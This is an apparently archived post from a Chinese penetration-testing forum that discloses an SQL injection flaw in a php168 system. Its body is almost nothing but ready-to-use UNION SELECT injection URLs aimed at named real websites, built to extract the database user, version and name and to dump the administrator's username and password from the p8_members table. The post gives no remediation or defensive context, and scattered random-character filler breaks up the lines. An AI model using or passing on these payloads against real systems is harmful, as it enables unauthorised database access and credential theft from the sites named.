找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3109|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--# \: ?$ Q. h& ?( t4 X
                                                         
4 W& l% z5 t/ q( x6 r                                       
5 S1 ^0 o% D& D& y5 ]4 h( \7 n* K- W3 F1 a- {" r+ H/ F
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
7 Y( l0 U* p5 K* G( [9 C                                                     
+ ~3 h$ {9 U) F( a- t- n4 j                                                                   4 l( P0 K3 I; k, a! i8 b
                                                        , W3 j( u7 i; X7 A; \1 K
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
* m# n' D& N. f- C# k2 k
# e& A, \7 y% d! L7 ^& F# n/ L6 Y/ V, p- d1 E9 X' R% [
- C6 o5 i5 X! T( ]& M# O3 h% b
                                                            
4 {" O, I) K- ^
: T* i2 b+ F  I& q3 phttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; g3 v7 b3 d  {2 R- H6 }6 X9 {* |* u, g/ y0 t# ]+ V6 t6 x9 b

4 J& y, S- }1 c& e3 Y. ^+ y# C8 V4 C% }
                                                                    9 ]8 j1 n9 ]2 a
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表